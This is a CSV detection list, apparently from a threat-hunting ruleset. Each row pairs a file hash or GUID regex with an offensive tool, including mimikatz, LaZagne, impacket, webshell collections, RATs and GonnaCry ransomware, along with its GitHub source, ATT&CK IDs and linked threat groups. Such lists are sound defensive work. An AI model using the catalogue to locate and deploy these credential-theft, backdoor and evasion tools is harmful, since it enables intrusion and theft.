"*4494BDD20D3FA171BF25A733B6755A6BE88F97BAEBB98820A385CE2D4BE9BE0F*",".{0,1000}4494BDD20D3FA171BF25A733B6755A6BE88F97BAEBB98820A385CE2D4BE9BE0F.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","25653"
"*4499aeab182ba401920e4177d8f78628d789659bdc5fb185d28eeefb2cac6527*",".{0,1000}4499aeab182ba401920e4177d8f78628d789659bdc5fb185d28eeefb2cac6527.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25655"
"*449a2fbf36afadf80c8655c09acc1418d286106f9ffe9422c0879861c7a70e58*",".{0,1000}449a2fbf36afadf80c8655c09acc1418d286106f9ffe9422c0879861c7a70e58.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25656"
"*449CE476-7B27-47F5-B09C-570788A2F261*",".{0,1000}449CE476\-7B27\-47F5\-B09C\-570788A2F261.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25657"
"*44a594fa7c72fcfc96a0a045060135a7571a215ede7bdde790cf992ec56595fd*",".{0,1000}44a594fa7c72fcfc96a0a045060135a7571a215ede7bdde790cf992ec56595fd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25659"
"*44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1*",".{0,1000}44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25661"
"*44ae8a2088ca416ed3c802f50eb55adbbb2d01fd528e76be8dd449004ce470ad*",".{0,1000}44ae8a2088ca416ed3c802f50eb55adbbb2d01fd528e76be8dd449004ce470ad.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","25662"
"*44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a*",".{0,1000}44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#filehash","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","25663"
"*44b33b5a598a9ad02356ba66221a7270a97ea4ad6f653b64a030e35fabf63e49*",".{0,1000}44b33b5a598a9ad02356ba66221a7270a97ea4ad6f653b64a030e35fabf63e49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25664"
"*44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae*",".{0,1000}44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25665"
"*44c00be47b5171d3edde7649c556efd366d1343665be0610c62941091b081e40*",".{0,1000}44c00be47b5171d3edde7649c556efd366d1343665be0610c62941091b081e40.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25666"
"*44D0366D-742F-4E0B-A67D-3B1044A66EA7*",".{0,1000}44D0366D\-742F\-4E0B\-A67D\-3B1044A66EA7.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","25669"
"*44d1e4dd465f3d374a0dc3433672aecd70ec9b64ea0e8c59a71a4d9166cc52aa*",".{0,1000}44d1e4dd465f3d374a0dc3433672aecd70ec9b64ea0e8c59a71a4d9166cc52aa.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25670"
"*44D5BE95-F34D-4CC5-846F-C7758943B8FA*",".{0,1000}44D5BE95\-F34D\-4CC5\-846F\-C7758943B8FA.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#GUIDproject","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","25671"
"*44dc84d80501de4a03c738e7b49825eb6bf402c2278b785eca99277b2bacf2a1*",".{0,1000}44dc84d80501de4a03c738e7b49825eb6bf402c2278b785eca99277b2bacf2a1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25672"
"*44dd7375f1bd3e113d15aac2634839f6a33b8706f27540f6b098e85866373ed4*",".{0,1000}44dd7375f1bd3e113d15aac2634839f6a33b8706f27540f6b098e85866373ed4.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","25673"
"*44de69934c7cc1b42b995276af916e6a14d8f2170f5de9306ed1e134d8f007de*",".{0,1000}44de69934c7cc1b42b995276af916e6a14d8f2170f5de9306ed1e134d8f007de.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25674"
"*44e769288f34ec5abca4d42a2ff890bf7e9f00218abce392076682226a74de45*",".{0,1000}44e769288f34ec5abca4d42a2ff890bf7e9f00218abce392076682226a74de45.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","25675"
"*44f266ce71ff63b838e83e60572bed76e2419411c3dcceec025fe63788491aaf*",".{0,1000}44f266ce71ff63b838e83e60572bed76e2419411c3dcceec025fe63788491aaf.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","25676"
"*44f2d9077535e735d92db431ad39f369175aba9fd5986d0bacd593693dc9498a*",".{0,1000}44f2d9077535e735d92db431ad39f369175aba9fd5986d0bacd593693dc9498a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25677"
"*44f2efa653fa33563cda24247c85a79a7e632e6d94129f53952fc9f90c3ad3aa*",".{0,1000}44f2efa653fa33563cda24247c85a79a7e632e6d94129f53952fc9f90c3ad3aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25678"
"*44f6d55e84972a295d82d3e670bd8356fe8fee457e19e9115f26005ffb24f68d*",".{0,1000}44f6d55e84972a295d82d3e670bd8356fe8fee457e19e9115f26005ffb24f68d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25680"
"*44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365*",".{0,1000}44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25681"
"*450746e51e6f1369e7e73c5e2122d0ca81153d3a4c7bcec3d66266b15ee547f7*",".{0,1000}450746e51e6f1369e7e73c5e2122d0ca81153d3a4c7bcec3d66266b15ee547f7.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","25682"
"*450bb5ca8c92ffe474f9ec1a48111c7574dd621fd326f9ff0474aabb90b3fbde*",".{0,1000}450bb5ca8c92ffe474f9ec1a48111c7574dd621fd326f9ff0474aabb90b3fbde.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25684"
"*450c54e126cbd38523f6dce014bd30bc95ede55141ffc3360b1dd6989895b28f*",".{0,1000}450c54e126cbd38523f6dce014bd30bc95ede55141ffc3360b1dd6989895b28f.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25686"
"*4510d8b0d9695f8d29ecc32d96634e68188ea36dbe15cdb26a807c07561ed791*",".{0,1000}4510d8b0d9695f8d29ecc32d96634e68188ea36dbe15cdb26a807c07561ed791.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25687"
"*4516398fb9263307b6632401b89e7a7bc979f6a8efa20492983e02cfd969de30*",".{0,1000}4516398fb9263307b6632401b89e7a7bc979f6a8efa20492983e02cfd969de30.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25689"
"*451d10d93c241b86d688cba1b05c7b5ee74995b5b558e11a6a4b114d080f5dce*",".{0,1000}451d10d93c241b86d688cba1b05c7b5ee74995b5b558e11a6a4b114d080f5dce.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25691"
"*451d5da48cb04cd5c45c832686019932d528fb51ac0b8ba4ddd4e082291a3bb3*",".{0,1000}451d5da48cb04cd5c45c832686019932d528fb51ac0b8ba4ddd4e082291a3bb3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25692"
"*4523836f6c7973deaf94d9b78c9cc30b5b3bbc5859cca5eb88ebfb2f566560d5*",".{0,1000}4523836f6c7973deaf94d9b78c9cc30b5b3bbc5859cca5eb88ebfb2f566560d5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25694"
"*4527b53e515c275e572f307246614ba4fc9152a25dfd2fd712246b321626bac6*",".{0,1000}4527b53e515c275e572f307246614ba4fc9152a25dfd2fd712246b321626bac6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25696"
"*4527ed46e39c8486c0f9d7f48fa7c4ae58a980db49ebcb881c174d88925a551b*",".{0,1000}4527ed46e39c8486c0f9d7f48fa7c4ae58a980db49ebcb881c174d88925a551b.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","25697"
"*453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949*",".{0,1000}453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25701"
"*453bbd3a1c26955b1ed273f7e206002b49a4a80ba58fbe5ab1b02e4f983c6fba*",".{0,1000}453bbd3a1c26955b1ed273f7e206002b49a4a80ba58fbe5ab1b02e4f983c6fba.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25703"
"*453c30c7c8d6c33e6f699d364016b8bae5ae5378e03e6e9966c17bbe9be9db33*",".{0,1000}453c30c7c8d6c33e6f699d364016b8bae5ae5378e03e6e9966c17bbe9be9db33.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","25704"
"*453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43*",".{0,1000}453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","25705"
"*454711d2a1a5526d75e2df5ba08bd0a1a1e5833efc59bbe6b41e31b7c32e8e76*",".{0,1000}454711d2a1a5526d75e2df5ba08bd0a1a1e5833efc59bbe6b41e31b7c32e8e76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25706"
"*45480e4a4de392608ab151ba8c1586f5a65319c976fbfa0f9f5f0ab72bad76df*",".{0,1000}45480e4a4de392608ab151ba8c1586f5a65319c976fbfa0f9f5f0ab72bad76df.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","25707"
"*4549092826ddbd01de6a9d05e0146ca12544e98ed832cb9308dc8d11c4a987d8*",".{0,1000}4549092826ddbd01de6a9d05e0146ca12544e98ed832cb9308dc8d11c4a987d8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25708"
"*4551264b08c24e9acf8b38695d3334c9870c5b5a7f88b3d3a69d8eed0b6c927f*",".{0,1000}4551264b08c24e9acf8b38695d3334c9870c5b5a7f88b3d3a69d8eed0b6c927f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25710"
"*4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b*",".{0,1000}4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25711"
"*45570458c8065fd92b833dbf89ed9777f7326a6802cb0b25b7b499e486411e52*",".{0,1000}45570458c8065fd92b833dbf89ed9777f7326a6802cb0b25b7b499e486411e52.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25712"
"*455944be49563e9e917624046e1d638743d7579238f28456fff1ea9b7c21ae28*",".{0,1000}455944be49563e9e917624046e1d638743d7579238f28456fff1ea9b7c21ae28.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25713"
"*455a5ed5b8aca163fd8bbc11a06de8b652517c50a32c634f33a6a093d47e3d4e*",".{0,1000}455a5ed5b8aca163fd8bbc11a06de8b652517c50a32c634f33a6a093d47e3d4e.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25714"
"*455a614b6dd52b17b4af639045bd0c3c3ddad152334607978ec9e915553246e9*",".{0,1000}455a614b6dd52b17b4af639045bd0c3c3ddad152334607978ec9e915553246e9.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","25715"
